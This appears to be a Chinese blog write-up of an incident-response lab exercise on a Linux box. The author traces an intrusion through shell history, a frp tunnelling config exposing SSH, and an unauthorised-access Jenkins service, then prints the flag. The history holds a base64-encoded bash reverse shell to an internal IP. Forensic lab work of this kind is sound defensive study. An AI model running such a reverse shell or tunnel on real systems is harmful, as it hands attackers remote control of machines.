您好,欢迎来到个人技术集锦。
搜索
当前位置:首页应急响应靶机练习 - easy溯源(Linux)

应急响应靶机练习 - easy溯源(Linux)

个人技术集锦 2025-06-08
导读一、背景 小张是个刚入门的程序猿,在公司开发产品的时候突然被叫去应急,小张心想"早知道简历上不写会应急了",于是call了运维小王的电话,小王说"你面试的时候不是说会应急吗?伪造简历吗?真该死。" 3. 存在漏洞的服务(提示:7个字符) 4. 攻击者留下的flag(格式zgsf{}) 6. 攻击者的ID名称 二、环境准备 账户密码:zgsfsys/zgsfsys(root用户也是这个密码) 三、开始 1.挑战一 使用history命令,发现一段可疑编码 YmFzaCAtaSA+JiAvZ

一、背景

小张是个刚入门的程序猿,在公司开发产品的时候突然被叫去应急,小张心想"早知道简历上不写会应急了",于是call了运维小王的电话,小王说"你面试的时候不是说会应急吗?伪造简历吗?真该死。"

3. 存在漏洞的服务(提示:7个字符)

4. 攻击者留下的flag(格式zgsf{})

6. 攻击者的ID名称

二、环境准备

账户密码:zgsfsys/zgsfsys(root用户也是这个密码)

三、开始

1.挑战一

使用history命令,发现一段可疑编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExLjEyOS8xMjM0IDA+JjE=

 

2.挑战二

zgsfsys@ubuntu:~$ sudo -i
[sudo] password for zgsfsys: 
root@ubuntu:~# ls
chuantou
root@ubuntu:~# cd chuantou
root@ubuntu:~/chuantou# ls
frpc  frpc.toml  system
root@ubuntu:~/chuantou# cat frpc.toml
serverAddr = "127.0.0.1"
serverPort = 7000

[[proxies]]
name = "Hack-Server"
type = "tcp"
localIP = "156.66.33.66"
localPort = 22
remotePort = 6000
root@ubuntu:~/chuantou# 

3.挑战三

在history中看到,有多次查看log文件的记录

查看日志发现,jenkins服务正在监听0.0.0.0:8080

 发现存在未授权访问漏洞,所以存在漏洞的服务就是jenkins

4.挑战四

攻击者留下的flag就是上面图中的,为

zgsf{gongzhonghaozhigongshanfangshiyanshi}

5.挑战五、挑战六(无解)

引用:

四、验证

这个靶机确实“easy”了。 

Copyright © 2019- zgxue.com 版权所有 京ICP备2021021884号-5

违法及侵权请联系:TEL:199 1889 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务